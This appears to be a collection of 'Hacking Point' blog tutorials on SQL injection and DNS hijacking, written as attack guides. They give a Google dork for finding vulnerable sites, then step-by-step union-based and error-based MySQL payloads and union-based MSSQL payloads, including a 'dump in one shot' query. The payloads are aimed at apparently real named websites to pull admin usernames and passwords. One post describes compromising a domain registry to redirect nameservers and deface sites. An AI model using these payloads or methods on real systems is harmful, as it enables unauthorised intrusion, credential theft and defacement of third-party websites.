Hack a website with Simple SQL Injection | Hacking Point

How to Hack any webSite by simple SQL Injection?

First of all open Google and write this dork:

inurl:.php?id=

You will see hundred of websites having this format

www.site.com/anything.php?id=86

There may be any number in place of 86

Ab kisi bhi link ko open karen. Site kuch aisi hogi:

Www.Site.com/index.php?id=5

Lets see thats its Vulnerable or not. Type ' after id=5

The site will be like this:

Www.Site.com/index.php?id=5'

If it gives any SQL error, It means its Vulnerable to SQL Injection and we can Hack it.

Now we find the number of columns by using ORDER BY command

id=5 order by 1--

id=5 order by 2--

Carry on increasing numbers after ORDER BY 

Now Suppose you get any error or any message on ORDER BY 6-- such as "UNKNOWN COLUMN IN ORDER CLAUSE" 

Then it is clear that there are 5 columns in the database.

Now lets find vulnerable column which can accept our random commands and Queries.

For This we use UNION ALL SELECT columnsSeriesHere--

Such as UNION SELECT 1,2,3,4,5--

Just write this and put a Hyphen ( - ) minus sign after id= (eg, id=-5)

id=-5 union all select 1,2,3,4,5--

Now after pressing enter the new page will show you any number between 1 - 5

Suppose you see 2 anywhere on the screen it means 2nd column is vulnerable and we can insert our Queries from this column.

Find its database version

Replace 2 with @@version   or   version() in your Query.

id=5 union all select 1,@@version,3,4,5--

It will show you the Database version on the screen, now note that if you see a version 5 or greater than 5 then it is easy But if you see the version less than 5 mean 4 then we have to Guess the names of tables and columns which is very difficult.

Lets talk about version 5 or greater.

Write this...!

id=5 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

It will show you the whole tables of the database

Now see for admin or user because in these tables we can get admin passwords and Hack the website...

id=5 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='admin'--

It will show all the columns of the table Admin; such as username : password : Email.)

Now final step. We will now extract the information of these columns.

id=5 union all select 1,group_concat(Username,0x3a,Password,0x3a,Email),3,4,5 from admin--

It will show the username , password and the Email of the admin

Now find admin panel , login and controll the website. Have a fun :) 

If you have any problem in any step feel free to ask.

If you Like it please share.

Thanks all.

DNS Poisoning and DNS Hijacking | Hacking Point

How to Hack a Website with DNS Poisoning/DNS Hijacking:

So you might be thinking how websites get DNS Poisoned or in other words, DNS Hijacked...!!!

Recently, all of wou know that many Greate sites such as Google had been defaced. Not only 1 but 6 Googles were Defaced Like Google Indonesia, Google Malaysia, Google Pakistan, Google Palestine, Google Serbia and Google Kenya. While many people still does not understand how Hackers managed to deface such big sites. In this article, I am going to show you how it works and how hackers manage a DNS Poisoning attack on the target.

1st of all, the Hacker tries to find the Domain Registry. Main registry can be found by using Google or Wikipedia. (Example: If the Hacker sets Google.com.au as his target, he would go to Google and search ”Official Domain Registry Of Australia” or would go to Wikipedia and search “.au”  )

Once the Hacker finds the main domain registry, He then starts to pentest (He tries to Hack that domain registry) the web application to find vulnerabilities where users login. When the Hacker finds a vulnerability  (Example:SQL Injection) , he then tries to access the server or the database using that vulnerability. Once he gets access to the database, he is then able to see all users login details (Usernames/Passwords/Email/ Password Reset Key). The hacker then tries to access to its targets account using the information provided from the database.

When the hacker gains access to its targets domain control panel using the user login details, he then has control of all domain names linked to that account. The hacker can then change its targets domain name servers and contact details. If the hacker wants its target to be DNS hijacked, he simple changes all passwords and login details. If the hacker wants to DNS poison its target, he only changes the domain name servers. Changing the domain name servers would allow the hacker to change from its old server to its new server (New server = Hackers server). Once the domain name servers are changed to the hackers server, the hacker then has full control of that website. He can then add his own page (deface page) on the domain name that he took control of. Once a the name servers are changed, it then takes maximum 24 hours for it to change globally (Normally it takes around 6 hours).

Hope you Like it

If you liked it then please share it so that other could also understand what is DNS Poisoning or DNS Hijacking.

Error Based SQL injection | Hacking Point

Hello Friends How are you. Today I am going to show you How we use Error Based SQL Injection and how we inject a website , access its database and get the stored information in it; such as passwords and credit card informations etc ;) .
Lets Get Started...!
I'm taking the below website as a sample to be injected.

http://www.latintourdimensions.com/overview/product_detail.php?id=352

From this point we can inject this website.
Now just simply add a colon ( ' ) in the end of the website

http://www.latintourdimensions.com/overview/product_detail.php?id=352'

See there we have SQL error,
If you see any error regarding SQL then the site is vulnerable and you can start injecting it ;)

   

Now we enter our commands to fool the SQL database and it gives us the whole stored information
Now lets find the number of columns in database
We use "ORDER BY" to find the number of columns

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 1--+           (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 2--+           (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 3--+           (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 4--+           (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 5--+          (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 6--+          (Here an ERROR is Occured)

We got an error at "ORDER BY 6--+"
It means there is no 6th column available in the database. Hence, its Clear that we have 5 Columns (Got it...?).
Now Lets find the column which is vulnerable and through which we can input our Queries to get the passwords etc.
To find Vulnerable Column we use "UNION SELECT 1,2,3....allColumns...,4,5 --+" 

http://www.latintourdimensions.com/overview/product_detail.php?id=352 +UNION+ALL+SELECT+1,2,3,4,5 --+

When we do Union select there is an error  :: The used SELECT statements have a different number of columns ::




Now you have to do error base injection. 

First find the version.

http://www.latintourdimensions.com/overview/product_detail.php?id=352+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

  

Here we find the version . :: 5.1.54-log:1::

Now find the Database.

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
     
    

Here You get the database name, Now find the Tables By the following Query

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

    

See Here the first table. " Activities " 

Increase the Limit to get More tables e.g

 LIMIT 0,1  Dot it to 1,1           2,1           3,1           4,1     and so on to extract more..

see.. 

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

   

See the second table is "AdminLogin" ..

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

See the third table is "Agencia"

and so on .... 


Now find the admin details from the table AdminLogin 

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x41646d696e4c6f67696e+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+


  

There is the first column in table Admin Login.

**NOTE**
If the col in which admin details are stored is named different e.g  like this site the table which contains admin details is AdminLogin , other webs have may different so what u have to change in the querry is that  

See in my querry i changed column name AdminLogin into hex
if any other web has different column name you have to change this
e.g the column name is admin so u have to change it into hex and then replace that hex with the admin hex encoded value. 

  Now extract more by increasing limit...


http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x41646d696e4c6f67696e+AND+table_schema=DATABASE()+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

   

The next column


http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x41646d696e4c6f67696e+AND+table_schema=DATABASE()+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

  

and thats one also been gotten

Now get data from These columns


  http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(usuario)+AS+CHAR),0x7e))+FROM+AdminLogin+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

To get data from Column "usuario" 

   

Means username is admin

Now find data from column " passw "

  http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(passw)+AS+CHAR),0x7e))+FROM+AdminLogin+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

  

This means that password is also admin.

So now just find the admin panel and get control to the whole website and enjoy

Thanks all.
Please Share if you Like it :) 

MS SQL Injection | Union Based MS SQL Injection | Hacking Point

  MS SQL UNION BASED INJECTION

  

Many of my friends are interested in breaking security but they dont know how to do that. Hense today I am going to write a tutorial on MSSQL injection. With the help of MSSQL injection you can inject any MS SQL server based website and access its database and sensitive informations such as passwords. Hope you will like it. This an advance type of SQL injection it will be a bit difficult for newbies. You should first read Basic SQL injection. Then It will be easy for you.

For this SQLi tutorial I will use this site as an example...!!! 

http://aquaservices.co.in/Product.aspx?Id=13

So the checking, The 1st part is same as MySQL first putting the  single quote ( ' )and then putting double quote ( " ) checking the error and i came to know this one is single quote based injection.

http://aquaservices.co.in/Product.aspx?Id=13'

It shows error like that.

INFORMATION:: 
When both Single quote and double Quotes gives error then there are high chances that the injection type is integer based because Single quote based do not give error when we put double qoute in the end, and when the injection is double quote based then single quote do not give error, and when both single quote and double quotes give error then apply the golden rule that the injection is integer type.

Now we need to keep in mind these comment type for MSSQL.

  

Lets try with the basics. Put -- in the end

http://aquaservices.co.in/Product.aspx?Id=13--

We can see the Home page but missing some contents.

http://aquaservices.co.in/Product.aspx?Id=13 order by 1 --

Also same result as above  

http://aquaservices.co.in/Product.aspx?Id=13 order by 100--

          Error. 
"The ORDER BY position number 100 is out of range of the number of items in the select list. "
   

We put all the numbers with "ORDER BY" starting from 1 to the number where error occurrs

Such as 

http://aquaservices.co.in/Product.aspx?Id=13 order by 1--

http://aquaservices.co.in/Product.aspx?Id=13 order by 2--

http://aquaservices.co.in/Product.aspx?Id=13 order by 3--

http://aquaservices.co.in/Product.aspx?Id=13 order by 4--

http://aquaservices.co.in/Product.aspx?Id=13 order by 5--

http://aquaservices.co.in/Product.aspx?Id=13 order by 6--

http://aquaservices.co.in/Product.aspx?Id=13 order by 7--

http://aquaservices.co.in/Product.aspx?Id=13 order by 8--

No Error seen till here But when we write Order By 9--

http://aquaservices.co.in/Product.aspx?Id=13 order by 9--

It shows an error. It mean 9th column is not available in database.
Hense its clear that there are 8 Columns
Now Lets proceed...

Now the next part is using using the UNION SELECT query.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8-

We write the number of columns with UNION SELECT
as there are 8 columns, we write UNION SELECT 1,2,3,4,5,6,7,8-
What again got the error.

Operand type clash: text is incompatible with int
  

In case of Such Errors in Union select statement we have an option to use null in all columns, so lets try that shit. 

Replace 1,2,3,4,5,6,7,8-- with null,null,null,null,null,null,null,null--

(Got it...?)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--

we got another error.

The text data type cannot be selected as DISTINCT because it is not comparable.

Heres one more type of error you can find while doing MSSQL Injection and the solution of that error is just use "Union All Select" in place of "Unoin Select", Lets try that shit again.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--

Again Error.. >.<

Conversion from type 'DBNull' to type 'String' is not valid.

The Solution of that type of Errors is as here we can see DBNULL to STRING mismatch so we have to convert each column one by one and see if we can get make it to work. To put a string we can use single quotes but i prefer using the db_name() function to avoid some error. Here we have Eight Columns changing each column one by one could be easy by it could be difficult when there are 20 or more columns so here I want to share a Payload generator to make that easy for us. I am gonna generate the payloads which will put db_name() in eight columns one by one.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave this column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that columns as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,db_name(),5,6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--

Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--

Here we can see the second Column Getting printed.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,7,db_name()--
Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the Database name in Error)

  There are many other ways also to collect  more information from MSSQL which are given here:

Lets try ...

we can Put @@version on place of vulnerable column to get the current version from database.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

WAaoOo Got success...   

Now we will extract the table names, here the syntax is different than MySQL of lack of limit clause in MSSQL. 

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the first table name : AdminLogin

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the second table name : Certificate

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the Forth table name : ClientList

In the same manner we can get all the tables one by one. Now lets get the columns. I will extract the colums from AdminLogin table.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the first column from AdminLogin Table : IsActive

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the Second column from AdminLogin Table : Password

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the Third column from AdminLogin Table : UserName

We got the table names the column names and now lets extrct the data from them. For concatination we can use %2b which is +.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--

At the End i would like to introduce you with  DIOS (dump in one shot Query) which makes the process a lot of faster. It shows all the information, No need to extract database one by one.
http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN ::
'%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name)
from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : '
from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns
 : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--

It will give error but actually its making the DIOS table so now lets try checking
 the output under temp_dios_sample.





I'm hopeful that you will like it

Please also Share if you like. So that others could also learn it.

Thanks All.